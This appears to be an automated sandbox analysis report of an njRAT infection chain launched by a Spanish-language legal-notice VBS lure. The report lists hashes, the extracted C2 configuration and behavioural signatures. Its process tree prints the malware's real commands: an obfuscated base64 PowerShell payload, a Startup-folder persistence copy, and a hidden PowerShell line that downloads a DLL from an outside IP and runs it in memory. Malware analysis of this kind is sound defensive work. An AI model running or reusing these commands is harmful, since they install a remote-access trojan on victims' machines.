Analysis
max time kernel: 300s
max time network: 304s
platform: windows10_x64
resource: win10-en-20211208
submitted: 04-01-2022 17:37
Static task: static1
Behavioral task: behavioral1
Sample: Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs
Resource: win7-en-20211208
General
Target: Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs
Size: 151KB
MD5: 375043101c2b371e5db90b0abdb0379d
SHA1: 8ca125b715a2f166ae8d24c87264f9beb4ddda6b
SHA256: fffd645e0ed3e653627764842ea17cb464bae80ef48ddb3dbe54d1eddf6b1bb9
SHA512: 582ad71b82c9fd666a5c26738264aded5d226e1a2417f30e55f4b258c3c111caf18b15dcf9d0ffb48c1fa96a996a845cd9e64357925b0f29939252085d6ff416
Malware Config
Extracted: http://91.241.19.49/ramdes/DownloaderF3.txt
Extracted:
  Family: njrat
  Version: 0.7NC
  Botnet: NYAN CAT
  C2: revg.duckdns.org:57831
  Mutex: ebef4abe57d24e8
  Attributes:
    reg_key: ebef4abe57d24e8
    splitter: @!#&^%$
Signatures
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

Blocklisted process makes network request (1 IoC)
  flow 22, pid 3096, powershell.exe

Drops startup file (2 IoCs)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs (powershell.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs (powershell.exe)

Suspicious use of SetThreadContext (1 IoC)
  PID 3096 set thread context of 1544: powershell.exe (3096) -> RegSvcs.exe (1544)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid 3976 powershell.exe (3 entries)
  pid 4456 powershell.exe (3 entries)
  pid 3096 powershell.exe (3 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  pid 1544 RegSvcs.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token: SeDebugPrivilege, pid 3976 powershell.exe
  Token: SeDebugPrivilege, pid 4456 powershell.exe
  Token: SeDebugPrivilege, pid 3096 powershell.exe
  Token: SeDebugPrivilege, pid 1544 RegSvcs.exe
  Token: 33, pid 1544 RegSvcs.exe / Token: SeIncBasePriorityPrivilege, pid 1544 RegSvcs.exe (alternating pair, repeated 30 times: 60 entries)

Suspicious use of WriteProcessMemory (18 IoCs)
  PID 3380 WScript.exe wrote to memory of 3752 cmd.exe (2 entries)
  PID 3752 cmd.exe wrote to memory of 3076 PING.EXE (2 entries)
  PID 3752 cmd.exe wrote to memory of 3976 powershell.exe (2 entries)
  PID 3380 WScript.exe wrote to memory of 4456 powershell.exe (2 entries)
  PID 4456 powershell.exe wrote to memory of 3096 powershell.exe (2 entries)
  PID 3096 powershell.exe wrote to memory of 1544 RegSvcs.exe (8 entries)
Processes
C:\Windows\System32\WScript.exe (PID 3380)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs"
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe (PID 3752)
    Command line: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\PING.EXE (PID 3076)
      Command line: ping 127.0.0.1 -n 10
      - Runs ping.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3976)
      Command line: powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Aviso_importante_para_dar_mejor_aclaración_del_cobro_jurídico_ver.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ RRQ.vbs')
      - Drops startup file
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4456)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙DQ☙cwBu☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3096)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (PID 1544)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
MD5: c6b0a774fa56e0169ed7bb7b25c114dd
SHA1: bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256: b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA512: 42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

MD5: 269f57a12a6488987deb408ba69b46e2
SHA1: 636ddfff17659f4c547c0149f934b69d9910b25d
SHA256: b563ea8391e80c1cee60a076396e7befd0957b335a6f73fe0f2e898296c6001b
SHA512: 6de4eac4d310f8d52a99ee055ef9a9da61d89eb215edc917e51fdb4af28534732c149d9ab33929f77b2524621948720397c322ce6348ab1ffb159bb6a711409f

MD5: 223a05cfe231f69fafc4878b9e804a4c
SHA1: 9e90c30a33c8e2ddbb6246c37d567fd36db11223
SHA256: f2e6a9ec22cb8e3af31c8600ab109b76e17386fe8cd41f70ff67af4a91dec221
SHA512: 02280c1479baa0a85476c74a6d661ffb9db71fe1c2eb321e42dcfbfcab684210604ba1cf83314d6bfcce04ec0c4d1e20e17a487dc6373c7e63b60f6eddb09499